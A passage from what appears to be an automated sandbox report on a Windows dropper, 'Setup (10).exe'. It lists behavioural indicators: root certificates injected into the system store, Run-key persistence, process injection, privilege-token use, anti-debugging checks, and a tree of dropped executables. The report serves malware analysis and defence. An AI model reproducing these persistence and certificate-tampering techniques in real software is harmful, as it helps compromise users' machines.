430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	Np8vA5UCo4zkkwJyvKzCJUo3.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	BFafj0WNEwStOL8atl0gJOMh.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	BFafj0WNEwStOL8atl0gJOMh.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	En4NVU90WutUC9D7nfHts7iL.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

4648 PING.EXE

pid	process
4648	PING.EXE

Script User-Agent 9 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	163	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	246	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	421	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	165	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	167	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	247	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	417	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

Setup (10).exe3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe3FyhsKaxI4JVmtHjcZ5MshWn.exeEn4NVU90WutUC9D7nfHts7iL.exe7498785.exe7UONhetEW1U9g8L58HdBk2yv.exe5597844.exepnPbzIiq0RnjdpyESPvO5EUX.exeZGDPFCTD_VZIqVCCnTF9izae.exeld0xZ3kQ40S3Liv8SVEAFr4q.exeWerFault.exe6529285.exeWerFault.exerTJmpNroSzcZ2hyO5FgjcQTc.exe

pid	process
1656	Setup (10).exe
956	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2312	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2456	En4NVU90WutUC9D7nfHts7iL.exe
2180	7498785.exe
2276	7UONhetEW1U9g8L58HdBk2yv.exe
1364	5597844.exe
2268	pnPbzIiq0RnjdpyESPvO5EUX.exe
2268	pnPbzIiq0RnjdpyESPvO5EUX.exe
2008	ZGDPFCTD_VZIqVCCnTF9izae.exe
2008	ZGDPFCTD_VZIqVCCnTF9izae.exe
268	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
268	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2728	WerFault.exe
2500	6529285.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
3056	WerFault.exe
2348	rTJmpNroSzcZ2hyO5FgjcQTc.exe
2348	rTJmpNroSzcZ2hyO5FgjcQTc.exe

Suspicious use of AdjustPrivilegeToken 20 IoCs

Processes:

3FyhsKaxI4JVmtHjcZ5MshWn.exeBXEi1nwcAlyBrA2uIxQi98MB.exeNp8vA5UCo4zkkwJyvKzCJUo3.exe5597844.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe6529285.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe7498785.exepnPbzIiq0RnjdpyESPvO5EUX.exeld0xZ3kQ40S3Liv8SVEAFr4q.exe7UONhetEW1U9g8L58HdBk2yv.exeZGDPFCTD_VZIqVCCnTF9izae.exeaJ6ZfNVNgPjOdhWzvFy_Kp7D.exeWerFault.exetaskkill.exetaskkill.exeWerFault.exerTJmpNroSzcZ2hyO5FgjcQTc.exeXe_oJj6i8BAAxfMFceiuazGr.exe3FyhsKaxI4JVmtHjcZ5MshWn.exe

description	pid	process
Token: SeDebugPrivilege	956	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Token: SeDebugPrivilege	904	BXEi1nwcAlyBrA2uIxQi98MB.exe
Token: SeDebugPrivilege	1424	Np8vA5UCo4zkkwJyvKzCJUo3.exe
Token: SeDebugPrivilege	1364	5597844.exe
Token: SeDebugPrivilege	2312	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Token: SeDebugPrivilege	2500	6529285.exe
Token: SeDebugPrivilege	2808	3FyhsKaxI4JVmtHjcZ5MshWn.exe
Token: SeDebugPrivilege	2180	7498785.exe
Token: SeDebugPrivilege	2268	pnPbzIiq0RnjdpyESPvO5EUX.exe
Token: SeDebugPrivilege	268	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
Token: SeDebugPrivilege	2276	7UONhetEW1U9g8L58HdBk2yv.exe
Token: SeDebugPrivilege	2008	ZGDPFCTD_VZIqVCCnTF9izae.exe
Token: SeDebugPrivilege	2216	aJ6ZfNVNgPjOdhWzvFy_Kp7D.exe
Token: SeDebugPrivilege	2728	WerFault.exe
Token: SeDebugPrivilege	2708	taskkill.exe
Token: SeDebugPrivilege	2676	taskkill.exe
Token: SeDebugPrivilege	3056	WerFault.exe
Token: SeDebugPrivilege	2348	rTJmpNroSzcZ2hyO5FgjcQTc.exe
Token: SeDebugPrivilege	2328	Xe_oJj6i8BAAxfMFceiuazGr.exe
Token: SeDebugPrivilege	456	3FyhsKaxI4JVmtHjcZ5MshWn.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

BFafj0WNEwStOL8atl0gJOMh.tmp

pid process

1260 BFafj0WNEwStOL8atl0gJOMh.tmp

pid	process
1260	BFafj0WNEwStOL8atl0gJOMh.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup (10).exeBFafj0WNEwStOL8atl0gJOMh.exeNp8vA5UCo4zkkwJyvKzCJUo3.exe

description	pid	process	target process
PID 1656 wrote to memory of 1816	1656	Setup (10).exe	eV_G61Oq5IaZUTvgeKBlWOA5.exe
PID 1656 wrote to memory of 1816	1656	Setup (10).exe	eV_G61Oq5IaZUTvgeKBlWOA5.exe
PID 1656 wrote to memory of 1816	1656	Setup (10).exe	eV_G61Oq5IaZUTvgeKBlWOA5.exe
PID 1656 wrote to memory of 1816	1656	Setup (10).exe	eV_G61Oq5IaZUTvgeKBlWOA5.exe
PID 1656 wrote to memory of 696	1656	Setup (10).exe	KNSaRCp1_xDXoKvn5gjZi_Wj.exe
PID 1656 wrote to memory of 696	1656	Setup (10).exe	KNSaRCp1_xDXoKvn5gjZi_Wj.exe
PID 1656 wrote to memory of 696	1656	Setup (10).exe	KNSaRCp1_xDXoKvn5gjZi_Wj.exe
PID 1656 wrote to memory of 696	1656	Setup (10).exe	KNSaRCp1_xDXoKvn5gjZi_Wj.exe
PID 1656 wrote to memory of 904	1656	Setup (10).exe	BXEi1nwcAlyBrA2uIxQi98MB.exe
PID 1656 wrote to memory of 904	1656	Setup (10).exe	BXEi1nwcAlyBrA2uIxQi98MB.exe
PID 1656 wrote to memory of 904	1656	Setup (10).exe	BXEi1nwcAlyBrA2uIxQi98MB.exe
PID 1656 wrote to memory of 904	1656	Setup (10).exe	BXEi1nwcAlyBrA2uIxQi98MB.exe
PID 1656 wrote to memory of 956	1656	Setup (10).exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
PID 1656 wrote to memory of 956	1656	Setup (10).exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
PID 1656 wrote to memory of 956	1656	Setup (10).exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
PID 1656 wrote to memory of 956	1656	Setup (10).exe	3FyhsKaxI4JVmtHjcZ5MshWn.exe
PID 1656 wrote to memory of 1424	1656	Setup (10).exe	Np8vA5UCo4zkkwJyvKzCJUo3.exe
PID 1656 wrote to memory of 1424	1656	Setup (10).exe	Np8vA5UCo4zkkwJyvKzCJUo3.exe
PID 1656 wrote to memory of 1424	1656	Setup (10).exe	Np8vA5UCo4zkkwJyvKzCJUo3.exe
PID 1656 wrote to memory of 1424	1656	Setup (10).exe	Np8vA5UCo4zkkwJyvKzCJUo3.exe
PID 1656 wrote to memory of 752	1656	Setup (10).exe	7UONhetEW1U9g8L58HdBk2yv.exe
PID 1656 wrote to memory of 752	1656	Setup (10).exe	7UONhetEW1U9g8L58HdBk2yv.exe
PID 1656 wrote to memory of 752	1656	Setup (10).exe	7UONhetEW1U9g8L58HdBk2yv.exe
PID 1656 wrote to memory of 752	1656	Setup (10).exe	7UONhetEW1U9g8L58HdBk2yv.exe
PID 1656 wrote to memory of 276	1656	Setup (10).exe	pnPbzIiq0RnjdpyESPvO5EUX.exe
PID 1656 wrote to memory of 276	1656	Setup (10).exe	pnPbzIiq0RnjdpyESPvO5EUX.exe
PID 1656 wrote to memory of 276	1656	Setup (10).exe	pnPbzIiq0RnjdpyESPvO5EUX.exe
PID 1656 wrote to memory of 276	1656	Setup (10).exe	pnPbzIiq0RnjdpyESPvO5EUX.exe
PID 1656 wrote to memory of 1712	1656	Setup (10).exe	cOhji2aN80AsCkajJmoFyAFW.exe
PID 1656 wrote to memory of 1712	1656	Setup (10).exe	cOhji2aN80AsCkajJmoFyAFW.exe
PID 1656 wrote to memory of 1712	1656	Setup (10).exe	cOhji2aN80AsCkajJmoFyAFW.exe
PID 1656 wrote to memory of 1712	1656	Setup (10).exe	cOhji2aN80AsCkajJmoFyAFW.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 2008	1656	Setup (10).exe	ZGDPFCTD_VZIqVCCnTF9izae.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 268	1656	Setup (10).exe	ld0xZ3kQ40S3Liv8SVEAFr4q.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1656 wrote to memory of 1296	1656	Setup (10).exe	BFafj0WNEwStOL8atl0gJOMh.exe
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1296 wrote to memory of 1260	1296	BFafj0WNEwStOL8atl0gJOMh.exe	BFafj0WNEwStOL8atl0gJOMh.tmp
PID 1424 wrote to memory of 1364	1424	Np8vA5UCo4zkkwJyvKzCJUo3.exe	5597844.exe
PID 1424 wrote to memory of 1364	1424	Np8vA5UCo4zkkwJyvKzCJUo3.exe	5597844.exe
PID 1424 wrote to memory of 1364	1424	Np8vA5UCo4zkkwJyvKzCJUo3.exe	5597844.exe
PID 1424 wrote to memory of 2068	1424	Np8vA5UCo4zkkwJyvKzCJUo3.exe	5099886.exe

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1656

C:\Users\Admin\Documents\eV_G61Oq5IaZUTvgeKBlWOA5.exe
"C:\Users\Admin\Documents\eV_G61Oq5IaZUTvgeKBlWOA5.exe"
2⤵
- Executes dropped EXE
PID:1816

C:\Users\Admin\Documents\eV_G61Oq5IaZUTvgeKBlWOA5.exe
"C:\Users\Admin\Documents\eV_G61Oq5IaZUTvgeKBlWOA5.exe"
3⤵
PID:2692

C:\Users\Admin\Documents\KNSaRCp1_xDXoKvn5gjZi_Wj.exe
"C:\Users\Admin\Documents\KNSaRCp1_xDXoKvn5gjZi_Wj.exe"
2⤵
- Executes dropped EXE
PID:696

C:\Users\Admin\Documents\BXEi1nwcAlyBrA2uIxQi98MB.exe
"C:\Users\Admin\Documents\BXEi1nwcAlyBrA2uIxQi98MB.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:904

C:\Users\Admin\Documents\BykZPJ0sZWglA0tfoIMPcw9u.exe
"C:\Users\Admin\Documents\BykZPJ0sZWglA0tfoIMPcw9u.exe"
2⤵
- Executes dropped EXE
PID:964

C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe
"C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe
"C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2312

C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe
"C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\8Zlp3iYq6T.bat"
5⤵
PID:2840

C:\Windows\system32\chcp.com
chcp 65001
6⤵
PID:2052

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
6⤵
PID:2928

C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe
"C:\Users\Admin\Documents\3FyhsKaxI4JVmtHjcZ5MshWn.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:456

C:\Windows\System32\win32spl\lsm.exe
"C:\Windows\System32\win32spl\lsm.exe"
7⤵
PID:2724

C:\Users\Admin\Documents\Np8vA5UCo4zkkwJyvKzCJUo3.exe
"C:\Users\Admin\Documents\Np8vA5UCo4zkkwJyvKzCJUo3.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1424

C:\Users\Admin\AppData\Roaming\5597844.exe
"C:\Users\Admin\AppData\Roaming\5597844.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1364 -s 1816
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728

C:\Users\Admin\AppData\Roaming\5099886.exe
"C:\Users\Admin\AppData\Roaming\5099886.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:2068

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
4⤵
- Executes dropped EXE
PID:2436

C:\Users\Admin\AppData\Roaming\7498785.exe
"C:\Users\Admin\AppData\Roaming\7498785.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Users\Admin\AppData\Roaming\6529285.exe
"C:\Users\Admin\AppData\Roaming\6529285.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 1668
4⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Users\Admin\Documents\7UONhetEW1U9g8L58HdBk2yv.exe
"C:\Users\Admin\Documents\7UONhetEW1U9g8L58HdBk2yv.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:752

C:\Users\Admin\Documents\7UONhetEW1U9g8L58HdBk2yv.exe
C:\Users\Admin\Documents\7UONhetEW1U9g8L58HdBk2yv.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Users\Admin\Documents\pnPbzIiq0RnjdpyESPvO5EUX.exe
"C:\Users\Admin\Documents\pnPbzIiq0RnjdpyESPvO5EUX.exe"
2⤵
- Executes dropped EXE
PID:276

C:\Users\Admin\Documents\pnPbzIiq0RnjdpyESPvO5EUX.exe
C:\Users\Admin\Documents\pnPbzIiq0RnjdpyESPvO5EUX.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2268

C:\Users\Admin\Documents\cOhji2aN80AsCkajJmoFyAFW.exe
"C:\Users\Admin\Documents\cOhji2aN80AsCkajJmoFyAFW.exe"
2⤵
- Executes dropped EXE
PID:1712

C:\Users\Admin\Documents\ZGDPFCTD_VZIqVCCnTF9izae.exe
"C:\Users\Admin\Documents\ZGDPFCTD_VZIqVCCnTF9izae.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Users\Admin\Documents\ld0xZ3kQ40S3Liv8SVEAFr4q.exe
"C:\Users\Admin\Documents\ld0xZ3kQ40S3Liv8SVEAFr4q.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Users\Admin\Documents\BFafj0WNEwStOL8atl0gJOMh.exe
"C:\Users\Admin\Documents\BFafj0WNEwStOL8atl0gJOMh.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1296

C:\Users\Admin\AppData\Local\Temp\is-HFV9H.tmp\BFafj0WNEwStOL8atl0gJOMh.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HFV9H.tmp\BFafj0WNEwStOL8atl0gJOMh.tmp" /SL5="$20158,138429,56832,C:\Users\Admin\Documents\BFafj0WNEwStOL8atl0gJOMh.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:1260

C:\Users\Admin\AppData\Local\Temp\is-Q5RSA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-Q5RSA.tmp\Setup.exe" /Verysilent
4⤵
PID:2904

C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
5⤵
PID:1172

C:\Users\Admin\AppData\Local\Temp\is-M01Q2.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M01Q2.tmp\Stats.tmp" /SL5="$20230,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
6⤵
PID:1996

C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
5⤵
PID:2896

C:\Windows\SysWOW64\cmd.exe
